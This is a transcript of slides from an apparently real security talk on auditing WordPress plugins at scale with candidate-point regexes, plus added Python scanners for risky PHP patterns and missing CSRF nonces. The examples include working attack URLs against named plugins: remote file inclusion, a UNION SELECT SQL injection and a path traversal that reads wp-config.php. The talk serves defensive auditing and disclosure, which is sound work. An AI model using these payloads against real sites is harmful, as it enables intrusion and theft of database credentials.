Large-scale application security
DESCRIPTION
Large-scale application security. Charlie Eriksen. Agenda: Define the problem space; Testing and auditing techniques; Step 1 – Define target; Step 2 – Understand the target; Step 3 – Find critical/high-risk code paths to review; Step 4 – Review and test.
TRANSCRIPT
Large-scale application security
Charlie Eriksen
Agenda
• Define the problem space
• Testing and auditing techniques
• Step 1 – Define target
• Step 2 – Understand the target
• Step 3 – Find critical/high-risk code paths to review
• Step 4 – Review and test
• Step 5 – Assess your findings and iterate
• Future challenges
  ▫ Locating the absence of CSRF protection
  ▫ Real-time alerting
Goals
• The ability to take a large amount of code and audit it for vulnerabilities
• Prioritize time spent in an audit based on risk
• Spend as little time as possible to find as many vulnerabilities as possible
Inspiration
Problem space
• Large amounts of large code bases exist
• Reviewing in depth is cost prohibitive
  ▫ … and is going to take all of your life
  ▫ … and you’ll still miss half the vulnerabilities
• What is the cost per vulnerability found?
• What vulnerabilities have the higher risk?
  ▫ Risk($) =
Vulnerability classes and mitigation
• Systematic vulnerabilities
  ▫ Framework
  ▫ Code review
  ▫ Manual/Automatic testing
• Business/design logic
  ▫ Code review
  ▫ Manual testing
What we’re not trying to solve
• Reviewing business logic
• Pin-point accuracy of vulnerabilities
• (Not really) reviewing for the absence of…
  ▫ We’ll look at my attempt at reviewing for the absence of CSRF protection later!
Testing techniques
White box
Black box
The sweet spot
White box
• Pros
  ▫ Not restricted by your discovery phase
  ▫ Gets you straight to where interesting things happen
• Cons
  ▫ Some code can be too hard to statically analyze
  ▫ Things may hide in plain sight
Black box
• Pros
  ▫ Some parts can be automated
  ▫ Allows you to observe behavior
  ▫ Will uncover the most obvious flaws
• Cons
  ▫ Uncovering some bugs can be expensive
  ▫ Special code-paths may never be executed
Audit ROI
• This is probably true for most companies
  ▫ Large number of applications
  ▫ Lots of legacy
  ▫ Not enough time to audit all thoroughly
• Consider:
  ▫ What do you not know? Are there risks you’re not aware of?
  ▫ What is your vulnerability tolerance?
  ▫ What vulnerabilities have the highest impact?
  ▫ What vulnerabilities are most likely to be discovered?
Audit ROI
[Figure: Audit ROI matrix with axes Discoverability (Hard to Easy) and Impact (Low to High); quadrant labels: “$$$”, “Good!”, “Are you google? If not, wasted time/money”]
Candidate point strategy
• Fastest way to identify a lot of vulnerabilities
• Starts with identifying:
  ▫ Points with side effects
  ▫ Known vulnerable patterns
• Then back-tracing
Step 1 – Define target
• Find a target
  ▫ In-house?
  ▫ Public projects? Plugins!
• Obtain source code
![Page 23: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/23.jpg)
Wordpress example
![Page 24: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/24.jpg)
Step 2 – Understand the target
• Learn the language
• Internalize OWASP top 10
• Observe the framework and language
  ▫ Dangerous functions
  ▫ Mitigation techniques
• Find commonly vulnerable code patterns
![Page 25: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/25.jpg)
PHP/Wordpress important functions
• A good list exists here for PHP: http://stackoverflow.com/questions/3115559/exploitable-php-functions
• Highlights:
  ▫ include/require
  ▫ system/exec/shell_exec
  ▫ eval
• Wordpress specific:
  ▫ wpdb
![Page 26: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/26.jpg)
Step 3 – Find critical/high-risk code paths to review
• Higher-risk code paths are where you’ll want to spend more time
• Determine your critical functionality and assets
• Examples might be:
  ▫ System calls
  ▫ Database access
  ▫ File system access
  ▫ Web-specific things: forms, markup output
  ▫ Encoding (base64)
  ▫ Cryptographic usage (md5!?)
• These will be our candidate points
![Page 27: Large-scale application security](https://reader036.vdocuments.net/reader036/viewer/2022062306/56816859550346895dde8b01/html5/thumbnails/27.jpg)
Good PHP regexes
• (include|require).*\$_(POST|GET|REQUEST)
• file_get_contents.*\$_(POST|GET|REQUEST)
• (eval|exec|system|shell_exec).*\$_(POST|GET|REQUEST)
• SELECT .* FROM .* \$_(POST|GET|REQUEST)
• (echo|print).*\$_(POST|GET|REQUEST)
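A small candidate-point scanner that applies the slide’s regexes (plus the md5 and array_merge ones from the examples later in the deck) to PHP source lines, then skips commented-out code as the kind of noise reduction Step 4 calls for. This is an added example, not the author’s tooling; the PHP lines in SAMPLE_FILES are constructed for the demonstration and are not taken from any real plugin.

```python
import re
# Candidate-point regexes from the slides, keyed by the vulnerability class each hints at.
PATTERNS = {
    "file inclusion": re.compile(r"(include|require).*\$_(POST|GET|REQUEST)"),
    "file disclosure": re.compile(r"file_get_contents.*\$_(POST|GET|REQUEST)"),
    "command execution": re.compile(r"(eval|exec|system|shell_exec).*\$_(POST|GET|REQUEST)"),
    "sql injection": re.compile(r"SELECT .* FROM .* \$_(POST|GET|REQUEST)"),
    "xss": re.compile(r"(echo|print).*\$_(POST|GET|REQUEST)"),
    "weak crypto": re.compile(r"md5\s?\(.*\$_(GET|POST|REQUEST)"),
    "variable overwrite": re.compile(r"array_merge\(.*\$_(POST|GET|REQUEST)"),
}
# Constructed PHP lines standing in for plugin files; not code from any real plugin.
SAMPLE_FILES = {
    "download.php": [
        "$opts = array_merge($defaults, $_POST);",
        "include($_GET['abspath'] . 'config.php');",
        "// include($_REQUEST['old']); legacy path, disabled",
    ],
    "playlist.php": [
        "$row = $wpdb->get_row(\"SELECT * FROM videos WHERE id = \" . $_GET['vid']);",
        "$ok = $wpdb->get_row($wpdb->prepare(\"SELECT * FROM videos WHERE id = %d\", $vid));",
    ],
    "pdf.php": [
        "echo file_get_contents($_GET['file']);",
        "$token = md5($_POST['password']);",
    ],
}

def scan_source(name, lines, skip_comments=True):
    """Return (file, lineno, category, line) for each line matching a candidate-point regex."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        stripped = line.strip()
        # Noise reduction (step 4): commented-out code matches the regex but is not live.
        if skip_comments and stripped.startswith(("//", "#", "*", "/*")):
            continue
        for category, rx in PATTERNS.items():
            if rx.search(line):  # one line can hit several classes, e.g. echo + file_get_contents
                hits.append((name, lineno, category, stripped))
    return hits

def scan_all(files, **kw):
    """Scan a {filename: [lines]} mapping; returns all hits in file order."""
    return [h for name, lines in files.items() for h in scan_source(name, lines, **kw)]

def summarize(hits):  # hits per class: a first cut at where to spend review time
    counts = {}
    for _, _, category, _ in hits:
        counts[category] = counts.get(category, 0) + 1
    return counts
```

Note that the prepared-statement line in playlist.php produces no hit while the concatenated query does, which is exactly the kind of signal the regex-first pass is meant to give before any back-tracing.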
Step 4 – Review and test
• Start by casting the net wide on a project
• As you learn more about it, start being more specific and reduce noise
• Learn to review code at a glance
• High risk vulnerabilities are usually easily seen at a glance
Example 1
Example 1 – Cryptographic
md5\s?\(.*\$_(GET|POST|REQUEST)
Example 1 – Cryptographic exploit
Example 2
Example 2 – File inclusion
(include|require).*\$_(POST|GET|REQUEST)
Example 2 – File inclusion
/wordpress/wp-content/plugins/zingiri-web-shop/fws/download.php?abspath=ftp://hello:[email protected]/
Example 3
Example 3 – SQL Injection
SELECT .* FROM .* \$_(POST|GET|REQUEST)
Example 3 – SQL Injection
/wordpress/wp-content/plugins/all-video-gallery/xml/playlist.php?vid=2 UNION SELECT 1, 2, user(), @@version, 5, 6, 7, 8, 9, 10, database(), 12, 13, 14, 15, 16, 17, 18
Example 4
Example 4 – File disclosure
file_get_contents.*\$_(POST|GET|REQUEST)
Example 4 – File disclosure
/wordpress/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php
Step 5 – Assess your findings and iterate
• Steps to take
  ▫ Assess risk
  ▫ Do root cause analysis
  ▫ Consider whether there are likely to be more vulnerabilities of this type
  ▫ Find out if there are steps that can be taken to mitigate the class of vulnerability at large
• Find next steps to improve your ROI
  ▫ Are you coming close to your risk tolerance?
  ▫ Are there still unknowns?
  ▫ Are there other higher-risk areas (ROI?)
  ▫ Have you addressed the most discoverable bugs?
Methodology
• All vulnerabilities found using this method
• All vulnerabilities submitted to Secunia SVCRP
  ▫ Sweet program, check it out
• Data based on their advisories
  ▫ Download numbers pulled manually
Research findings
• 24 plugins
• ~2 million downloads
• 66 vulnerabilities
Downloads
[Bar chart of downloads per plugin, axis 0 to 1,000,000. Plugins: GD Star Rating, Google Document Embedder, Quotes Collection, Duplicator, Crayon Syntax Highlighter, WP Symposium, TheCartPress, Zingiri Web Shop, WP Online Store, Sendit Newsletter, Zingiri Forum, Profile Builder, Flexi Quote Rotator, A page flip book, All video Gallery, Floating Social Media Links, FireStorm Professional.., Paid Memberships Pro, Cimy User Manager, Mac Photo Gallery, Nmedia Mailchimp, Ungallery, Global Content Blocks]
Vulnerabilities
• Security bypass: 11
• File inclusion: 6
• File disclosure: 5
• SQL injection: 25
• XSS: 18
• Command execution: 1
Time to patch
[Bar chart of days to patch per advisory, axis 0 to 140]
• 6 advisories without patch
• 34 days to patch on average
Future challenges – Locate the absence of mitigation
• Simple question: How do you accurately pin-point the absence of a vulnerability mitigation?
• Secure by default helps, but can’t be assumed
Locating the absence of CSRF protection
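The deck does not show how the author approached this, so the following is an added heuristic of my own, not the author’s method: split a plugin file into functions and flag those that read request input and reach a state-changing call without any WordPress nonce check in the same body. It assumes the real WordPress functions wp_verify_nonce, check_admin_referer and check_ajax_referer as the mitigation markers, and the plugin source in SAMPLE_PLUGIN is constructed for the demonstration.

```python
import re
# WordPress nonce-verification functions; any call in the function body counts as a CSRF check.
NONCE_CHECK = re.compile(r"\b(wp_verify_nonce|check_admin_referer|check_ajax_referer)\s*\(")
READS_INPUT = re.compile(r"\$_(POST|GET|REQUEST)\b")
# State-changing WordPress/wpdb calls: a handler that reaches one of these from request input
# without a nonce check is a candidate for missing CSRF protection (heuristic, not proof).
SIDE_EFFECT = re.compile(r"\b(update_option|add_option|delete_option|wp_insert_post|wp_delete_post)\s*\("
                         r"|\$wpdb->(query|insert|update|delete)\s*\(")
FUNC_START = re.compile(r"\bfunction\s+(\w+)\s*\(")

# Constructed plugin source for the demonstration; not a real plugin.
SAMPLE_PLUGIN = """<?php
function save_settings() {
    $opts = array('color' => $_POST['color']);
    update_option('myplugin_opts', $opts);
}
function save_settings_safe() {
    check_admin_referer('myplugin_save');
    update_option('myplugin_opts', array('color' => $_POST['color']));
}
function show_settings() {
    echo esc_html($_GET['tab']);
}
"""

def split_functions(src):
    """Return (name, body) for each named function, matching braces to find the body."""
    funcs = []
    for m in FUNC_START.finditer(src):
        start = src.index("{", m.end())
        depth, i = 0, start
        while i < len(src):
            if src[i] == "{":
                depth += 1
            elif src[i] == "}":
                depth -= 1
                if depth == 0:
                    break
            i += 1
        funcs.append((m.group(1), src[start:i + 1]))
    return funcs

def find_unprotected_handlers(src):
    """Names of functions that read request input and change state with no nonce check in scope."""
    return [name for name, body in split_functions(src)
            if READS_INPUT.search(body) and SIDE_EFFECT.search(body)
            and not NONCE_CHECK.search(body)]
```

A nonce verified in a helper or by a wrapping hook will show up as a false positive, so every flagged function still needs a human look; this only narrows where to look.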
Results
• 30 plugins
• 14,000,000 downloads
Plugin downloads
• 455k downloads on average
Future challenges – Vulnerability alerting
• We know how to look for vulnerabilities
• You have to keep up with current development
• Reviewing the same code over and over again stops paying off
• How do we make a machine look for things to review in real-ish time?
Conclusions
• Intelligent grep use can uncover vulnerabilities
• Using your understanding of a language and framework serves as a great starting point for code reviews
• By reviewing critical code-paths for mechanical vulnerabilities, you can cover a lot of ground in short time
• Systematic vulnerabilities exist and can be uncovered en masse quite trivially
• Use root cause analysis appropriately and fix the problem rather than the symptom
Bonus example!
Bonus example!
array_merge\(.*\$_(POST|GET|REQUEST)